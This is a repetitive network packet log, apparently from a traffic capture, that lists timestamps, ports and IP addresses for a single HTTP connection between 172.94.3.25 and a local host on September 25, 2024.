Sep 25, 2024 16:03:55.955166101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955177069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955188990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955199957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.955221891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.955539942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955550909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955575943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955586910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955588102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.955600023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955626011 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.999274969 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.032701969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.032725096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.032742023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.032763004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.032938957 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.032949924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.032979965 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033023119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033041000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033061028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033070087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033073902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033086061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033097982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033098936 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033118010 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033214092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033248901 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033278942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033289909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033322096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033427000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033442974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033466101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033473969 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033478022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033490896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033514023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033689022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033709049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033721924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033723116 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033735037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033749104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033751965 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.033761978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.033781052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.077440023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.110797882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.110816002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.110829115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.110934973 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.111654997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111668110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111679077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111716986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.111737967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.111769915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111789942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111809969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111820936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111833096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.111834049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111846924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111860991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.111864090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111874104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111886024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111886978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.111901045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111912012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.111915112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.111939907 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.112003088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.112042904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.112090111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.112101078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.112112999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.112128019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.112137079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.112169027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.112202883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.155555964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.188925982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.188946009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.188958883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.188975096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189017057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.189079046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.189111948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189198971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189212084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189235926 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.189362049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189374924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189385891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189409971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.189436913 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.189644098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189703941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189713955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189737082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189743996 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.189749002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189773083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.189802885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189815998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189846039 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.189851046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189863920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189877033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189886093 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.189888954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.189913988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.190052032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.190063000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.190073013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.190083981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.190094948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.190120935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.234553099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.234589100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.234601021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.234615088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.234693050 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.268356085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268377066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268388987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268420935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268433094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268445015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268527985 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.268558979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.268749952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268759966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268775940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268790960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.268913984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.268950939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.269099951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269110918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269123077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269140959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.269263983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269274950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269285917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269294024 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.269295931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269308090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269315004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.269320965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269345999 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.269407034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269418001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269431114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.269448042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.269464970 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.312609911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.312628031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.312639952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.312822104 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.345082045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345096111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345114946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345127106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345138073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345150948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345165014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345194101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.345231056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.345375061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345386028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345396996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345457077 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.345592976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345628977 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.345652103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345662117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345673084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345704079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.345854044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345892906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.345915079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345926046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345938921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.345962048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.346030951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.346041918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.346052885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.346065998 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.346086025 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.346112967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.346147060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.346157074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.346168995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.346179962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.346201897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.390691996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.390729904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.390742064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.390846014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.423430920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423532963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423561096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.423588991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423624039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423645020 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.423662901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423692942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423708916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.423724890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423759937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423772097 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.423791885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423835993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.423845053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423877001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423911095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423918009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.423943996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.423984051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.424041986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424077034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424110889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424120903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.424165010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424210072 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.424230099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424258947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424304962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.424308062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424340963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424374104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424388885 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.424407005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.424446106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.474462032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.474479914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.474497080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.474508047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.474642992 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.474716902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.511670113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511687040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511698008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511708975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511729956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511748075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511759043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511769056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511780977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511791945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511805058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511816025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511833906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511847019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511862040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.511924028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.511984110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.512284040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.512325048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.512352943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.552720070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.552736044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.552747011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.552753925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.552877903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.579894066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.579905987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.579916954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.579952955 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.579976082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.579987049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.579998970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580015898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.580034971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.580252886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580264091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580291986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580311060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.580326080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580336094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580346107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580358982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580358982 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.580378056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.580638885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580673933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580677986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.580684900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580717087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.580750942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580761909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580773115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580806971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.580883026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580893993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580909967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.580921888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.580948114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.630824089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.630862951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.630875111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.630887985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.630920887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.630937099 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.641046047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.641208887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.641247988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.657967091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.657979965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.657999039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658009052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658040047 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.658078909 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.658484936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658497095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658509016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658526897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.658560991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658570051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658598900 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.658605099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658617020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658637047 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.658703089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.658740044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.659033060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.659071922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.659081936 CEST	80	49715	172.94.3.25	192.168.2.6
